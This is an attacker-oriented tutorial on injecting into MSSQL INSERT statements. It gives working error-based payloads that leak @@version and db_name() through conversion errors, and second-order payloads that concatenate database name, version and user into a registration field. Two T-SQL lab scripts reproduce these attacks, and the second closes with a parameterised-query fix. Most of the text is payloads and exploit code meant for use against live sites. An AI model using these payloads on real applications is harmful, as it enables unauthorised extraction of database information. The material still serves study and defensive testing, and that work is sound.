In the Name of ALLAH the Most Beneficent and the Merciful

This is another addition to our collection of SQL injection points. In this tutorial we are going to learn how to inject into an MSSQL INSERT query.

As with MySQL INSERT query injection, this can be done in two ways:

1. Error based.
2. Second Order Exploitation

Let's first start with error based SQLi. If you have read my tutorial on MSSQL Error Based Injection you should already be comfortable with error based injection in MSSQL, so we are going to use the same syntax.

Insert Query Example:
insert into tablename (column1,column2,column3,column4) values (1,'value2','value3','value4');

How do you confirm that your input lands in an INSERT query? That is simple if you can see the error; otherwise it is trial and error, which is what we always do. A quick check: a single quote in a string field typically produces Msg 105, "Unclosed quotation mark after the character string", and if the record you were trying to create (a user, a comment, a profile entry) never appears afterwards, the INSERT itself failed, which tells you your input was spliced into that statement.

1. Error Based

Here too remember the three basic rules of injecting: Close, Inject and then Balance. Let us assume we have an injection in one of the input values in the above query. Here is the error based injection syntax. Note that unlike MySQL, MSSQL has no dual table, so the subquery needs no FROM clause at all; a "from dual" would only give "Invalid object name 'dual'" and leak nothing.
If input is integer based:
(select 1 where @@version=1)
If input is between single quotes:
'*(select 1 where @@version=1)*'
If input is between double quotes (this only applies when the server runs with QUOTED_IDENTIFIER OFF; with the default ON setting double quotes delimit identifiers, not strings):
"*(select 1 where @@version=1)*"
Once we inject, it makes the query below:
insert into tablename (column1,column2,column3,column4) values (1,'value2',''*(select 1 where @@version=1)*'','value4');
The WHERE clause forces @@version, an nvarchar value, to be converted to int so it can be compared with 1. That conversion fails and SQL Server puts the offending value in the error text ("Conversion failed when converting the nvarchar value 'Microsoft SQL Server ...' to data type int"), so the version is shown as output. For the rest of the error based exploitation you can go back and check my tutorial on Error Based MSSQLi.
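As an added lab script (not from the original tutorial), here is the error based INSERT injection above reproduced end to end in T-SQL on a throwaway table. The table and column names are assumptions chosen to match the example query, and the script shows the legitimate statement, the injected one, and the same trick aimed at db_name():

```sql
-- Added lab script, not part of the original tutorial.
-- Table and column names are assumptions matching the example query.
CREATE TABLE dbo.tablename (
    column1 INT,
    column2 VARCHAR(100),
    column3 VARCHAR(100),
    column4 VARCHAR(100)
);

-- Baseline: the application's legitimate statement succeeds.
INSERT INTO dbo.tablename (column1, column2, column3, column4)
VALUES (1, 'value2', 'value3', 'value4');

-- Injected statement. The attacker's input for column3 was
--   '*(select 1 where @@version=1)*'
-- i.e. close the quote, inject the expression, re-balance the quote.
-- '' * (int) * '' is a valid arithmetic expression ('' converts to 0),
-- but the WHERE clause must convert @@version (nvarchar) to int, which
-- fails and puts the version string in the error text:
--   Msg 245: Conversion failed when converting the nvarchar value
--   'Microsoft SQL Server ...' to data type int.
INSERT INTO dbo.tablename (column1, column2, column3, column4)
VALUES (1, 'value2', ''*(SELECT 1 WHERE @@version=1)*'', 'value4');

-- Same technique, different target: leaks the current database name
-- (only works when the name is not itself numeric).
INSERT INTO dbo.tablename (column1, column2, column3, column4)
VALUES (1, 'value2', ''*(SELECT 1 WHERE db_name()=1)*'', 'value4');

-- What the MySQL-style payload from other tutorials does here: there is
-- no dual table in MSSQL, so this fails with Msg 208 before the WHERE
-- clause is ever evaluated and leaks nothing.
INSERT INTO dbo.tablename (column1, column2, column3, column4)
VALUES (1, 'value2', ''*(SELECT 1 FROM dual WHERE @@version=1)*'', 'value4');

DROP TABLE dbo.tablename;
```

Run the statements one at a time; each injected INSERT raises its own error and inserts nothing, which is exactly why the error message, not the table, is where the data comes back.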

Here is a video which shows practical error based MSSQLi in an INSERT query.

2. Second Order Exploitation

If you know that + is used to concatenate two strings in MSSQL, we can also use it to concatenate the output of our injection onto a field which we can see later somewhere in the application.

For example, let's say we have such an injection in the registration form of a site and this is the final query it builds to insert our user:
Insert into users (name,username,password,address,status) values ('your_input_name','your_input_username','your_input_password','your_input_address',1);
Now the best field for our injection is address, since we can usually see our address once we are registered. So our final injected query will be:
Insert into users (name,username,password,address,status) values ('your_input_name','your_input_username','your_input_password',''+db_name()+char(58)+char(58)+@@version+char(58)+char(58)+user+'',1);
This will print the current database, version and user, separated by :: (char(58) is the colon), in place of the address. Do not carry over the MySQL habit of a hex literal such as 0x3a3a as the separator: in MSSQL that is a varbinary value, and varchar + varbinary raises "The data types varchar and varbinary are incompatible in the add operator". If quotes are not filtered, '::' works as the separator too. One more caveat: @@version is long and contains line breaks, so if the address column is narrow the INSERT fails with "String or binary data would be truncated" and nothing is stored; in that case drop @@version from the payload or pull the values out one at a time. I sure will try soon to get a complete video tutorial on second order exploitation for MSSQL.
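As an added lab script (not from the original tutorial), here is the second order technique reproduced in T-SQL: the registration INSERT with the injected address, the later SELECT that plays the role of the page showing the address back, the separator mistake to avoid, and the parameterised form that stores the payload as plain text. Table and column names, the sample user values and the use of sp_executesql for the fix are assumptions for the demo:

```sql
-- Added lab script, not part of the original tutorial.
-- Table, column names and sample values are assumptions for the demo.
CREATE TABLE dbo.users (
    name     VARCHAR(100),
    username VARCHAR(100),
    password VARCHAR(100),
    address  VARCHAR(4000),   -- wide enough to hold @@version
    status   INT
);

-- The registration form's statement with the attacker's address input
--   '+db_name()+char(58)+char(58)+@@version+char(58)+char(58)+user+'
-- spliced in. char(58) is ':' and keeps extra quotes out of the payload.
-- 'user' here is the T-SQL niladic function returning the database user.
INSERT INTO dbo.users (name, username, password, address, status)
VALUES ('attacker', 'attacker1', 'pw',
        ''+db_name()+char(58)+char(58)+@@version+char(58)+char(58)+user+'', 1);

-- Later, wherever the application displays the address, the row carries
-- e.g. master::Microsoft SQL Server ...::dbo instead of an address.
SELECT username, address FROM dbo.users WHERE username = 'attacker1';

-- Why the MySQL-style 0x3a3a separator fails on MSSQL: 0x3a3a is
-- varbinary, and the add operator rejects varchar + varbinary with
--   Msg 402: The data types varchar and varbinary are incompatible
--   in the add operator.
-- SELECT db_name()+0x3a3a;

-- Fix: pass the input as a parameter so it is data, never T-SQL.
-- (The doubled quotes below only make the literal contain the payload
-- verbatim; the payload itself is stored as text and never evaluated.)
EXEC sp_executesql
    N'INSERT INTO dbo.users (name, username, password, address, status)
      VALUES (@name, @username, @password, @address, 1)',
    N'@name VARCHAR(100), @username VARCHAR(100),
      @password VARCHAR(100), @address VARCHAR(4000)',
    @name = 'attacker', @username = 'attacker2', @password = 'pw',
    @address = '''+db_name()+char(58)+char(58)+@@version+char(58)+char(58)+user+''';

-- The parameterised row shows the literal payload string, no data leaked.
SELECT username, address FROM dbo.users WHERE username = 'attacker2';

DROP TABLE dbo.users;
```

Compare the two SELECT results: the first address is the concatenated db_name(), @@version and user, the second is the payload text itself. That difference is the whole point of parameterisation, and it is what the application's developer was missing.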

I hope you enjoyed reading the tutorial; I will soon be up with more tutorials, so keep reading and learning.

Author : Zen Javanicus
Date : 2015-04-12